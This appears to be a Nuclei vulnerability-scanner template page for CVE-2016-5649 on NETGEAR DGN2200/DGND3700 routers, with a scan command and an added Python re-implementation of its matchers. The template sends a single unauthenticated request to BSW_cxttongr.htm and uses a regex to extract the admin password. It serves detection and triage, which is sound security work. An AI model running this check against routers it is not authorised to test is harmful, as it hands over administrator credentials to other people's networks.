NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
ID: CVE-2016-5649
Severity: critical
Author: suman_kar
Tags: cve2016,cve,iot,netgear,router,packetstorm
Description
NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page ‘BSW_cxttongr.htm’, which a remote attacker can access without any authentication. The page discloses the administrator password, which the attacker can then use to gain administrator access to the targeted router’s web interface.
YAML Source
```yaml
id: CVE-2016-5649

info:
  name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure
  author: suman_kar
  severity: critical
  description: NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.
  impact: |
    An attacker can obtain the admin password and gain unauthorized access to the router's settings, potentially leading to further compromise of the network.
  remediation: |
    Update the router firmware to the latest version, which includes a fix for the vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-5649
    - https://packetstormsecurity.com/files/140342/Netgear-DGN2200-DGND3700-WNDR4500-Information-Disclosure.html
    - http://packetstormsecurity.com/files/152675/Netgear-DGN2200-DGND3700-Admin-Password-Disclosure.html
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-5649
    cwe-id: CWE-319,CWE-200
    epss-score: 0.17436
    epss-percentile: 0.95662
    cpe: cpe:2.3:o:netgear:dgn2200_firmware:1.0.0.50_7.0.50:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: dgn2200_firmware
  tags: cve2016,cve,iot,netgear,router,packetstorm

http:
  - raw:
      - |
        GET /BSW_cxttongr.htm HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>Smart Wizard Result</title> "

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: password
        group: 1
        regex:
          - '<b>Success "([a-z]+)"'
        part: body
# digest: 4b0a00483046022100ef55eb4d11d5cb4190a848719d35d1c0b2d2081e0ac5c5fdb857e53fa5644fb50221008336f6392f421ac88077b5f5115bb33a43395e1436106b6d0b774f40d6dd30a8:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-5649.yaml"
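
The template's two matchers and its extractor, re-implemented as an added Python example (not part of the original template or of Nuclei) for triaging saved responses from your own devices offline. The function and field names and the sample response bodies are constructed for illustration; the second sample shows that a device is still exposed when the `[a-z]+` extractor captures nothing.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Title string from the template's word matcher (surrounding whitespace
# ignored here) and the regex from its extractor.
TITLE_WORD = "<title>Smart Wizard Result</title>"
PASSWORD_RE = re.compile(r'<b>Success "([a-z]+)"')


@dataclass
class Finding:
    exposed: bool             # both matchers satisfied (matchers-condition: and)
    password_captured: bool   # extractor regex produced group 1
    masked: Optional[str]     # password with all but the first character hidden


def evaluate(status: int, body: str) -> Finding:
    """Apply the status and word matchers, then the regex extractor."""
    exposed = status == 200 and TITLE_WORD in body
    if not exposed:
        return Finding(False, False, None)
    m = PASSWORD_RE.search(body)
    if m is None:
        # The page is served without authentication, but the password does not
        # fit [a-z]+ (digits, upper case). This is still a finding.
        return Finding(True, False, None)
    secret = m.group(1)
    # Keep the recovered credential out of scan logs; store a masked form only.
    return Finding(True, True, secret[0] + "*" * (len(secret) - 1))


# Constructed sample responses (hypothetical, not captured from a real device).
SAMPLES = {
    "vulnerable": (200, '<html><head><title>Smart Wizard Result</title></head>'
                        '<body><b>Success "hunter"</b></body></html>'),
    "mixed-case password": (200, '<title>Smart Wizard Result</title>'
                                 '<b>Success "Hunter2"</b>'),
    "login required": (401, "<title>401 Unauthorized</title>"),
}

if __name__ == "__main__":
    for name, (status, body) in SAMPLES.items():
        print(f"{name}: {evaluate(status, body)}")
```
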